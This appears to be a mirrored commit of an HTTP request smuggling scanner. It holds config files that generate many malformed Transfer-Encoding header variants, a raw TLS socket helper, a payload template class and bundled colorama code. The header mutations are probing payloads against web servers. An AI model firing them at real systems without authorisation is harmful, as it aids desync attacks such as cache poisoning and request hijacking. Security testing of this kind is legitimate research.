mirror of
https://github.com/defparam/smuggler
synced 2024-11-14 16:05:05 +00:00
initial checkin
initial checkin
This commit is contained in:
commit
b3516c3684
31
configs/default.py
Normal file
31
configs/default.py
Normal file
@ -0,0 +1,31 @@
|
||||
|
||||
def render_template(gadget):
|
||||
RN = "\r\n"
|
||||
p = Payload()
|
||||
p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN
|
||||
# p.header += "Transfer-Encoding: chunked" +RN
|
||||
p.header += gadget + RN
|
||||
p.header += "Host: __HOST__" + RN
|
||||
p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN
|
||||
p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN
|
||||
p.header += "Content-Length: __REPLACE_CL__" + RN
|
||||
return p
|
||||
|
||||
|
||||
mutations["nameprefix1"] = render_template(" Transfer-Encoding: chunked")
|
||||
mutations["tabprefix1"] = render_template("Transfer-Encoding:\tchunked")
|
||||
mutations["tabprefix2"] = render_template("Transfer-Encoding\t:\tchunked")
|
||||
mutations["space1"] = render_template("Transfer-Encoding : chunked")
|
||||
|
||||
for i in [0x1,0x4,0x8,0x9,0xa,0xb,0xc,0xd,0x1F,0x20,0x7f,0xA0,0xFF]:
|
||||
mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i))
|
||||
mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i))
|
||||
mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i))
|
||||
mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i))
|
||||
mutations["xprespace-%02x"%i] = render_template("X: X%cTransfer-Encoding: chunked"%(i))
|
||||
mutations["endspacex-%02x"%i] = render_template("Transfer-Encoding: chunked%cX: X"%(i))
|
||||
mutations["rxprespace-%02x"%i] = render_template("X: X\r%cTransfer-Encoding: chunked"%(i))
|
||||
mutations["xnprespace-%02x"%i] = render_template("X: X%c\nTransfer-Encoding: chunked"%(i))
|
||||
mutations["endspacerx-%02x"%i] = render_template("Transfer-Encoding: chunked\r%cX: X"%(i))
|
||||
mutations["endspacexn-%02x"%i] = render_template("Transfer-Encoding: chunked%c\nX: X"%(i))
|
||||
|
27
configs/doubles.py
Normal file
27
configs/doubles.py
Normal file
@ -0,0 +1,27 @@
|
||||
|
||||
def render_template(gadget):
|
||||
RN = "\r\n"
|
||||
p = Payload()
|
||||
p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN
|
||||
p.header += gadget + RN
|
||||
p.header += "Host: __HOST__" + RN
|
||||
p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN
|
||||
p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN
|
||||
p.header += "Content-Length: __REPLACE_CL__" + RN
|
||||
return p
|
||||
|
||||
for i in range(0x1,0x21):
|
||||
mutations["%02x-%02x-XX-XX"%(i,i)] = render_template("%cTransfer-Encoding%c: chunked"%(i,i))
|
||||
mutations["%02x-XX-%02x-XX"%(i,i)] = render_template("%cTransfer-Encoding:%cchunked"%(i,i))
|
||||
mutations["%02x-XX-XX-%02x"%(i,i)] = render_template("%cTransfer-Encoding: chunked%c"%(i,i))
|
||||
mutations["XX-%02x-%02x-XX"%(i,i)] = render_template("Transfer-Encoding%c:%cchunked"%(i,i))
|
||||
mutations["XX-%02x-XX-%02x"%(i,i)] = render_template("Transfer-Encoding%c: chunked%c"%(i,i))
|
||||
mutations["XX-XX-%02x-%02x"%(i,i)] = render_template("Transfer-Encoding:%cchunked%c"%(i,i))
|
||||
|
||||
for i in range(0x7F,0x100):
|
||||
mutations["%02x-%02x-XX-XX"%(i,i)] = render_template("%cTransfer-Encoding%c: chunked"%(i,i))
|
||||
mutations["%02x-XX-%02x-XX"%(i,i)] = render_template("%cTransfer-Encoding:%cchunked"%(i,i))
|
||||
mutations["%02x-XX-XX-%02x"%(i,i)] = render_template("%cTransfer-Encoding: chunked%c"%(i,i))
|
||||
mutations["XX-%02x-%02x-XX"%(i,i)] = render_template("Transfer-Encoding%c:%cchunked"%(i,i))
|
||||
mutations["XX-%02x-XX-%02x"%(i,i)] = render_template("Transfer-Encoding%c: chunked%c"%(i,i))
|
||||
mutations["XX-XX-%02x-%02x"%(i,i)] = render_template("Transfer-Encoding:%cchunked%c"%(i,i))
|
52
configs/exhaustive.py
Normal file
52
configs/exhaustive.py
Normal file
@ -0,0 +1,52 @@
|
||||
|
||||
def render_template(gadget):
|
||||
RN = "\r\n"
|
||||
p = Payload()
|
||||
p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN
|
||||
p.header += gadget + RN
|
||||
p.header += "Host: __HOST__" + RN
|
||||
p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN
|
||||
p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN
|
||||
p.header += "Content-Length: __REPLACE_CL__" + RN
|
||||
return p
|
||||
|
||||
mutations["nameprefix1"] = render_template(" Transfer-Encoding: chunked")
|
||||
mutations["tabprefix1"] = render_template("Transfer-Encoding:\tchunked")
|
||||
mutations["tabprefix2"] = render_template("Transfer-Encoding\t:\tchunked")
|
||||
mutations["spacejoin1"] = render_template("Transfer Encoding: chunked")
|
||||
mutations["underjoin1"] = render_template("Transfer_Encoding: chunked")
|
||||
mutations["smashed"] = render_template("Transfer Encoding:chunked")
|
||||
mutations["space1"] = render_template("Transfer-Encoding : chunked")
|
||||
mutations["valueprefix1"] = render_template("Transfer-Encoding: chunked")
|
||||
mutations["vertprefix1"] = render_template("Transfer-Encoding:\u000Bchunked")
|
||||
mutations["commaCow"] = render_template("Transfer-Encoding: chunked, cow")
|
||||
mutations["cowComma"] = render_template("Transfer-Encoding: cow, chunked")
|
||||
mutations["contentEnc"] = render_template("Content-Encoding: chunked")
|
||||
mutations["linewrapped1"] = render_template("Transfer-Encoding:\n chunked")
|
||||
mutations["quoted"] = render_template("Transfer-Encoding: \"chunked\"")
|
||||
mutations["aposed"] = render_template("Transfer-Encoding: 'chunked'")
|
||||
mutations["lazygrep"] = render_template("Transfer-Encoding: chunk")
|
||||
mutations["sarcasm"] = render_template("TrAnSFer-EnCODinG: cHuNkeD")
|
||||
mutations["yelling"] = render_template("TRANSFER-ENCODING: CHUNKED")
|
||||
mutations["0dsuffix"] = render_template("Transfer-Encoding: chunked\r")
|
||||
mutations["tabsuffix"] = render_template("Transfer-Encoding: chunked\t")
|
||||
mutations["revdualchunk"] = render_template("Transfer-Encoding: cow\r\nTransfer-Encoding: chunked")
|
||||
mutations["0dspam"] = render_template("Transfer\r-Encoding: chunked")
|
||||
mutations["nested"] = render_template("Transfer-Encoding: cow chunked bar")
|
||||
mutations["spaceFF"] = render_template("Transfer-Encoding:\xFFchunked")
|
||||
mutations["accentCH"] = render_template("Transfer-Encoding: ch\x96nked")
|
||||
mutations["accentTE"] = render_template("Transf\x82r-Encoding: chunked")
|
||||
mutations["x-rout"] = render_template("X:X\rTransfer-Encoding: chunked")
|
||||
mutations["x-nout"] = render_template("X:X\nTransfer-Encoding: chunked")
|
||||
for i in range(0x1,0x20):
|
||||
mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i))
|
||||
mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i))
|
||||
mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i))
|
||||
mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i))
|
||||
|
||||
for i in range(0x7F,0x100):
|
||||
mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i))
|
||||
mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i))
|
||||
mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i))
|
||||
mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i))
|
||||
|
178
lib/EasySSL.py
Normal file
178
lib/EasySSL.py
Normal file
@ -0,0 +1,178 @@
|
||||
#!/usr/bin/python
|
||||
# MIT License
|
||||
#
|
||||
# Copyright (c) 2020 Evan Custodio
|
||||
#
|
||||
# Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
# of this software and associated documentation files (the "Software"), to deal
|
||||
# in the Software without restriction, including without limitation the rights
|
||||
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
# copies of the Software, and to permit persons to whom the Software is
|
||||
# furnished to do so, subject to the following conditions:
|
||||
#
|
||||
# The above copyright notice and this permission notice shall be included in all
|
||||
# copies or substantial portions of the Software.
|
||||
#
|
||||
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
# SOFTWARE.
|
||||
import socket, ssl
|
||||
import time
|
||||
|
||||
# EasySSL: A simple module to perform SSL Queries
|
||||
class EasySSL():
|
||||
# constructor: we can specify recv bufsize
|
||||
def __init__(self, SSLFlag = True, bufsize=8192):
|
||||
self.bufsize = bufsize
|
||||
self.SSLFlag = SSLFlag
|
||||
|
||||
# connect() - Simply provide webserver address and optional port (default 443)
|
||||
def connect(self,host,port=443,timeout=None):
|
||||
# 1) Create an SSL context to wrap our socket
|
||||
# 2) Create our socket
|
||||
# 3) Wrap our socket
|
||||
# 4) Connect
|
||||
if (self.SSLFlag):
|
||||
self.context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
|
||||
self.s = socket.setdefaulttimeout(timeout)
|
||||
self.s = socket.create_connection((host, port))
|
||||
self.ssl = self.context.wrap_socket(self.s, server_hostname=host)
|
||||
self.ssl.settimeout(timeout)
|
||||
else:
|
||||
self.s = socket.setdefaulttimeout(timeout)
|
||||
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
self.s.settimeout(timeout)
|
||||
self.s.connect((host, port))
|
||||
|
||||
|
||||
def close(self):
|
||||
if (self.SSLFlag):
|
||||
self.ssl.close()
|
||||
del self.ssl
|
||||
del self.context
|
||||
del self.s
|
||||
else:
|
||||
self.s.close()
|
||||
del self.s
|
||||
|
||||
# send() - Sends data through the socket
|
||||
def send(self, data):
|
||||
if (self.SSLFlag):
|
||||
return self.ssl.send(data)
|
||||
else:
|
||||
return self.s.send(data)
|
||||
|
||||
def recv(self):
|
||||
try:
|
||||
if (self.SSLFlag):
|
||||
self.ssl.settimeout(None)
|
||||
buffer = self.ssl.recv(self.bufsize)
|
||||
else:
|
||||
self.s.settimeout(None)
|
||||
buffer = self.s.recv(self.bufsize)
|
||||
|
||||
except Exception as e:
|
||||
buffer = None
|
||||
#print (e)
|
||||
return buffer
|
||||
|
||||
def recv_nb(self,timeout=0.0):
|
||||
try:
|
||||
|
||||
if (self.SSLFlag):
|
||||
self.ssl.settimeout(timeout)
|
||||
buffer = self.ssl.recv(self.bufsize)
|
||||
else:
|
||||
self.s.settimeout(timeout)
|
||||
buffer = self.s.recv(self.bufsize)
|
||||
|
||||
except Exception as e:
|
||||
buffer = None
|
||||
#print (e)
|
||||
return buffer
|
||||
|
||||
# recv_web is an HTTP response parser. This parser has been hacked together and probably doesn't conform to RFC
|
||||
# please do not use this for any serious HTTP response parsing. Only meant for security research
|
||||
def recv_web(self):
|
||||
ST_PROCESS_HEADERS = 0
|
||||
ST_PROCESS_BODY_CL = 1
|
||||
ST_PROCESS_BODY_TE = 2
|
||||
ST_PROCESS_BODY_NODATA = 3
|
||||
|
||||
state = ST_PROCESS_HEADERS
|
||||
dat_raw = b""
|
||||
CL_TE = -1
|
||||
size = 0
|
||||
k = 0
|
||||
cls = False
|
||||
http_ver = "1.1" # assume 1.1, this will get overwritten
|
||||
while(1):
|
||||
#time.sleep(0.01)
|
||||
#k += 1
|
||||
#print ("loop %d" %(k))
|
||||
#print ("state = %d"%(state))
|
||||
retry = 0
|
||||
while (1):
|
||||
|
||||
sample = self.recv_nb(1)
|
||||
if ((sample == None) or (sample == b"")):
|
||||
if (retry == 5):
|
||||
if len(dat_raw) == 0:
|
||||
cls = True
|
||||
return (cls, dat_raw.decode("UTF-8",'ignore'))
|
||||
retry += 1
|
||||
else:
|
||||
dat_raw += sample
|
||||
break
|
||||
|
||||
dat_dec = dat_raw.decode("UTF-8",'ignore')
|
||||
dat_split = dat_dec.split("\r\n")
|
||||
|
||||
if (state == ST_PROCESS_HEADERS):
|
||||
if dat_split[0][0:4] == "HTTP":
|
||||
#print("Found HTTP")
|
||||
http_ver = dat_split[0][5:8]
|
||||
if (http_ver == "1.0"):
|
||||
cls = True
|
||||
state = ST_PROCESS_HEADERS
|
||||
for line in dat_split:
|
||||
if (len(line) >= len("Transfer-Encoding:")) and (line[0:18].lower() == "transfer-encoding:"):
|
||||
#print ("Found TE Header")
|
||||
CL_TE = 1
|
||||
elif (len(line) >= len("Content-Length:")) and (line[0:15].lower() == "content-length:"):
|
||||
size = int(line[15:].strip())
|
||||
#print ("Found CL Header: Size %d" % (size))
|
||||
CL_TE = 0
|
||||
elif (len(line) >= len("Connection: close")) and (line[0:17].lower() == "connection: close"):
|
||||
cls = True
|
||||
elif (len(line) >= len("Connection: keep-alive")) and (line[0:22] == "connection: keep-alive"):
|
||||
cls = False
|
||||
elif (line == ""):
|
||||
#print ("Found end of headers")
|
||||
if (CL_TE == 0):
|
||||
state = ST_PROCESS_BODY_CL
|
||||
elif (CL_TE == 1):
|
||||
state = ST_PROCESS_BODY_TE
|
||||
else:
|
||||
state = ST_PROCESS_NODATA
|
||||
return (cls, dat_dec)
|
||||
break
|
||||
|
||||
if (state == ST_PROCESS_BODY_CL):
|
||||
start = dat_dec.find("\r\n\r\n")+4
|
||||
#print ("%d %d " % (len(dat_raw)-start,size))
|
||||
if (len(dat_raw)-start) == size:
|
||||
return (cls, dat_dec)
|
||||
|
||||
if (state == ST_PROCESS_BODY_TE):
|
||||
# FIXME: This is a terrible hack and can easily break
|
||||
# replace with an implementation that tracks the chunked lengths
|
||||
if dat_dec[-5:] == "0\r\n\r\n":
|
||||
return (cls, dat_dec)
|
||||
|
||||
|
||||
|
73
lib/Payload.py
Normal file
73
lib/Payload.py
Normal file
@ -0,0 +1,73 @@
|
||||
#!/usr/bin/python
|
||||
# MIT License
|
||||
#
|
||||
# Copyright (c) 2020 Evan Custodio
|
||||
#
|
||||
# Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
# of this software and associated documentation files (the "Software"), to deal
|
||||
# in the Software without restriction, including without limitation the rights
|
||||
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
# copies of the Software, and to permit persons to whom the Software is
|
||||
# furnished to do so, subject to the following conditions:
|
||||
#
|
||||
# The above copyright notice and this permission notice shall be included in all
|
||||
# copies or substantial portions of the Software.
|
||||
#
|
||||
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
# SOFTWARE.
|
||||
import random
|
||||
import re
|
||||
|
||||
RN = "\r\n"
|
||||
EndChunk = "0\r\n\r\n"
|
||||
def Chunked(data):
|
||||
return hex(len(data))[2:]+RN+data+RN
|
||||
|
||||
class Payload():
|
||||
def __init__(self, host=None):
|
||||
self.header = None
|
||||
self.body = None
|
||||
self.method = "GET"
|
||||
self.endpoint = "/"
|
||||
self.host = host
|
||||
self.cl = -1
|
||||
|
||||
def __str__(self):
|
||||
def replace_random(match):
|
||||
return str(random.random()).split('.')[1]
|
||||
|
||||
|
||||
if (self.header == None):
|
||||
raise AttributeError("No header data specified in Payload instance")
|
||||
if (self.body == None):
|
||||
raise AttributeError("No body data specified in Payload instance")
|
||||
if (self.host == None):
|
||||
raise AttributeError("No host specified in Payload instance")
|
||||
|
||||
result = self.header + RN + self.body
|
||||
result = re.sub("__RANDOM__",replace_random,result)
|
||||
|
||||
if (self.cl < 0):
|
||||
result = re.sub("__REPLACE_CL__",str(len(self.body)),result)
|
||||
else:
|
||||
result = re.sub("__REPLACE_CL__",str(self.cl),result)
|
||||
|
||||
result = re.sub("__METHOD__",self.method,result)
|
||||
result = re.sub("__ENDPOINT__",self.endpoint,result)
|
||||
result = re.sub("__HOST__",self.host,result)
|
||||
|
||||
return (result)
|
||||
|
||||
def __setattr__(self, name, value):
|
||||
if name == "body" and (type("string") != type(value) and value != None):
|
||||
raise AttributeError("Only string types allowed")
|
||||
if name == "header" and (type("string") != type(value) and value != None):
|
||||
raise AttributeError("Only string types allowed")
|
||||
if name == "host" and (type("string") != type(value) and value != None):
|
||||
raise AttributeError("Only string types allowed")
|
||||
self.__dict__[name] = value
|
1
lib/__init__.py
Normal file
1
lib/__init__.py
Normal file
@ -0,0 +1 @@
|
||||
pass
|
BIN
lib/__pycache__/EasySSL.cpython-36.pyc
Normal file
BIN
lib/__pycache__/EasySSL.cpython-36.pyc
Normal file
Binary file not shown.
BIN
lib/__pycache__/Payload.cpython-36.pyc
Normal file
BIN
lib/__pycache__/Payload.cpython-36.pyc
Normal file
Binary file not shown.
BIN
lib/__pycache__/__init__.cpython-36.pyc
Normal file
BIN
lib/__pycache__/__init__.cpython-36.pyc
Normal file
Binary file not shown.
6
lib/colorama/__init__.py
Normal file
6
lib/colorama/__init__.py
Normal file
@ -0,0 +1,6 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
from .initialise import init, deinit, reinit, colorama_text
|
||||
from .ansi import Fore, Back, Style, Cursor
|
||||
from .ansitowin32 import AnsiToWin32
|
||||
|
||||
__version__ = '0.4.1'
|
BIN
lib/colorama/__pycache__/__init__.cpython-36.pyc
Normal file
BIN
lib/colorama/__pycache__/__init__.cpython-36.pyc
Normal file
Binary file not shown.
BIN
lib/colorama/__pycache__/ansi.cpython-36.pyc
Normal file
BIN
lib/colorama/__pycache__/ansi.cpython-36.pyc
Normal file
Binary file not shown.
BIN
lib/colorama/__pycache__/ansitowin32.cpython-36.pyc
Normal file
BIN
lib/colorama/__pycache__/ansitowin32.cpython-36.pyc
Normal file
Binary file not shown.
BIN
lib/colorama/__pycache__/initialise.cpython-36.pyc
Normal file
BIN
lib/colorama/__pycache__/initialise.cpython-36.pyc
Normal file
Binary file not shown.
BIN
lib/colorama/__pycache__/win32.cpython-36.pyc
Normal file
BIN
lib/colorama/__pycache__/win32.cpython-36.pyc
Normal file
Binary file not shown.
BIN
lib/colorama/__pycache__/winterm.cpython-36.pyc
Normal file
BIN
lib/colorama/__pycache__/winterm.cpython-36.pyc
Normal file
Binary file not shown.
102
lib/colorama/ansi.py
Normal file
102
lib/colorama/ansi.py
Normal file
@ -0,0 +1,102 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
'''
|
||||
This module generates ANSI character codes to printing colors to terminals.
|
||||
See: http://en.wikipedia.org/wiki/ANSI_escape_code
|
||||
'''
|
||||
|
||||
CSI = '\033['
|
||||
OSC = '\033]'
|
||||
BEL = '\007'
|
||||
|
||||
|
||||
def code_to_chars(code):
|
||||
return CSI + str(code) + 'm'
|
||||
|
||||
def set_title(title):
|
||||
return OSC + '2;' + title + BEL
|
||||
|
||||
def clear_screen(mode=2):
|
||||
return CSI + str(mode) + 'J'
|
||||
|
||||
def clear_line(mode=2):
|
||||
return CSI + str(mode) + 'K'
|
||||
|
||||
|
||||
class AnsiCodes(object):
|
||||
def __init__(self):
|
||||
# the subclasses declare class attributes which are numbers.
|
||||
# Upon instantiation we define instance attributes, which are the same
|
||||
# as the class attributes but wrapped with the ANSI escape sequence
|
||||
for name in dir(self):
|
||||
if not name.startswith('_'):
|
||||
value = getattr(self, name)
|
||||
setattr(self, name, code_to_chars(value))
|
||||
|
||||
|
||||
class AnsiCursor(object):
|
||||
def UP(self, n=1):
|
||||
return CSI + str(n) + 'A'
|
||||
def DOWN(self, n=1):
|
||||
return CSI + str(n) + 'B'
|
||||
def FORWARD(self, n=1):
|
||||
return CSI + str(n) + 'C'
|
||||
def BACK(self, n=1):
|
||||
return CSI + str(n) + 'D'
|
||||
def POS(self, x=1, y=1):
|
||||
return CSI + str(y) + ';' + str(x) + 'H'
|
||||
|
||||
|
||||
class AnsiFore(AnsiCodes):
|
||||
BLACK = 30
|
||||
RED = 31
|
||||
GREEN = 32
|
||||
YELLOW = 33
|
||||
BLUE = 34
|
||||
MAGENTA = 35
|
||||
CYAN = 36
|
||||
WHITE = 37
|
||||
RESET = 39
|
||||
|
||||
# These are fairly well supported, but not part of the standard.
|
||||
LIGHTBLACK_EX = 90
|
||||
LIGHTRED_EX = 91
|
||||
LIGHTGREEN_EX = 92
|
||||
LIGHTYELLOW_EX = 93
|
||||
LIGHTBLUE_EX = 94
|
||||
LIGHTMAGENTA_EX = 95
|
||||
LIGHTCYAN_EX = 96
|
||||
LIGHTWHITE_EX = 97
|
||||
|
||||
|
||||
class AnsiBack(AnsiCodes):
|
||||
BLACK = 40
|
||||
RED = 41
|
||||
GREEN = 42
|
||||
YELLOW = 43
|
||||
BLUE = 44
|
||||
MAGENTA = 45
|
||||
CYAN = 46
|
||||
WHITE = 47
|
||||
RESET = 49
|
||||
|
||||
# These are fairly well supported, but not part of the standard.
|
||||
LIGHTBLACK_EX = 100
|
||||
LIGHTRED_EX = 101
|
||||
LIGHTGREEN_EX = 102
|
||||
LIGHTYELLOW_EX = 103
|
||||
LIGHTBLUE_EX = 104
|
||||
LIGHTMAGENTA_EX = 105
|
||||
LIGHTCYAN_EX = 106
|
||||
LIGHTWHITE_EX = 107
|
||||
|
||||
|
||||
class AnsiStyle(AnsiCodes):
|
||||
BRIGHT = 1
|
||||
DIM = 2
|
||||
NORMAL = 22
|
||||
RESET_ALL = 0
|
||||
|
||||
Fore = AnsiFore()
|
||||
Back = AnsiBack()
|
||||
Style = AnsiStyle()
|
||||
Cursor = AnsiCursor()
|
257
lib/colorama/ansitowin32.py
Normal file
257
lib/colorama/ansitowin32.py
Normal file
@ -0,0 +1,257 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import re
|
||||
import sys
|
||||
import os
|
||||
|
||||
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
|
||||
from .winterm import WinTerm, WinColor, WinStyle
|
||||
from .win32 import windll, winapi_test
|
||||
|
||||
|
||||
winterm = None
|
||||
if windll is not None:
|
||||
winterm = WinTerm()
|
||||
|
||||
|
||||
class StreamWrapper(object):
|
||||
'''
|
||||
Wraps a stream (such as stdout), acting as a transparent proxy for all
|
||||
attribute access apart from method 'write()', which is delegated to our
|
||||
Converter instance.
|
||||
'''
|
||||
def __init__(self, wrapped, converter):
|
||||
# double-underscore everything to prevent clashes with names of
|
||||
# attributes on the wrapped stream object.
|
||||
self.__wrapped = wrapped
|
||||
self.__convertor = converter
|
||||
|
||||
def __getattr__(self, name):
|
||||
return getattr(self.__wrapped, name)
|
||||
|
||||
def __enter__(self, *args, **kwargs):
|
||||
# special method lookup bypasses __getattr__/__getattribute__, see
|
||||
# https://stackoverflow.com/questions/12632894/why-doesnt-getattr-work-with-exit
|
||||
# thus, contextlib magic methods are not proxied via __getattr__
|
||||
return self.__wrapped.__enter__(*args, **kwargs)
|
||||
|
||||
def __exit__(self, *args, **kwargs):
|
||||
return self.__wrapped.__exit__(*args, **kwargs)
|
||||
|
||||
def write(self, text):
|
||||
self.__convertor.write(text)
|
||||
|
||||
def isatty(self):
|
||||
stream = self.__wrapped
|
||||
if 'PYCHARM_HOSTED' in os.environ:
|
||||
if stream is not None and (stream is sys.__stdout__ or stream is sys.__stderr__):
|
||||
return True
|
||||
try:
|
||||
stream_isatty = stream.isatty
|
||||
except AttributeError:
|
||||
return False
|
||||
else:
|
||||
return stream_isatty()
|
||||
|
||||
@property
|
||||
def closed(self):
|
||||
stream = self.__wrapped
|
||||
try:
|
||||
return stream.closed
|
||||
except AttributeError:
|
||||
return True
|
||||
|
||||
|
||||
class AnsiToWin32(object):
|
||||
'''
|
||||
Implements a 'write()' method which, on Windows, will strip ANSI character
|
||||
sequences from the text, and if outputting to a tty, will convert them into
|
||||
win32 function calls.
|
||||
'''
|
||||
ANSI_CSI_RE = re.compile('\001?\033\\[((?:\\d|;)*)([a-zA-Z])\002?') # Control Sequence Introducer
|
||||
ANSI_OSC_RE = re.compile('\001?\033\\]((?:.|;)*?)(\x07)\002?') # Operating System Command
|
||||
|
||||
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
|
||||
# The wrapped stream (normally sys.stdout or sys.stderr)
|
||||
self.wrapped = wrapped
|
||||
|
||||
# should we reset colors to defaults after every .write()
|
||||
self.autoreset = autoreset
|
||||
|
||||
# create the proxy wrapping our output stream
|
||||
self.stream = StreamWrapper(wrapped, self)
|
||||
|
||||
on_windows = os.name == 'nt'
|
||||
# We test if the WinAPI works, because even if we are on Windows
|
||||
# we may be using a terminal that doesn't support the WinAPI
|
||||
# (e.g. Cygwin Terminal). In this case it's up to the terminal
|
||||
# to support the ANSI codes.
|
||||
conversion_supported = on_windows and winapi_test()
|
||||
|
||||
# should we strip ANSI sequences from our output?
|
||||
if strip is None:
|
||||
strip = conversion_supported or (not self.stream.closed and not self.stream.isatty())
|
||||
self.strip = strip
|
||||
|
||||
# should we should convert ANSI sequences into win32 calls?
|
||||
if convert is None:
|
||||
convert = conversion_supported and not self.stream.closed and self.stream.isatty()
|
||||
self.convert = convert
|
||||
|
||||
# dict of ansi codes to win32 functions and parameters
|
||||
self.win32_calls = self.get_win32_calls()
|
||||
|
||||
# are we wrapping stderr?
|
||||
self.on_stderr = self.wrapped is sys.stderr
|
||||
|
||||
def should_wrap(self):
|
||||
'''
|
||||
True if this class is actually needed. If false, then the output
|
||||
stream will not be affected, nor will win32 calls be issued, so
|
||||
wrapping stdout is not actually required. This will generally be
|
||||
False on non-Windows platforms, unless optional functionality like
|
||||
autoreset has been requested using kwargs to init()
|
||||
'''
|
||||
return self.convert or self.strip or self.autoreset
|
||||
|
||||
def get_win32_calls(self):
|
||||
if self.convert and winterm:
|
||||
return {
|
||||
AnsiStyle.RESET_ALL: (winterm.reset_all, ),
|
||||
AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
|
||||
AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
|
||||
AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
|
||||
AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
|
||||
AnsiFore.RED: (winterm.fore, WinColor.RED),
|
||||
AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
|
||||
AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
|
||||
AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
|
||||
AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
|
||||
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
|
||||
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
|
||||
AnsiFore.RESET: (winterm.fore, ),
|
||||
AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True),
|
||||
AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True),
|
||||
AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True),
|
||||
AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True),
|
||||
AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True),
|
||||
AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True),
|
||||
AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True),
|
||||
AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True),
|
||||
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
|
||||
AnsiBack.RED: (winterm.back, WinColor.RED),
|
||||
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
|
||||
AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
|
||||
AnsiBack.BLUE: (winterm.back, WinColor.BLUE),
|
||||
AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
|
||||
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
|
||||
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
|
||||
AnsiBack.RESET: (winterm.back, ),
|
||||
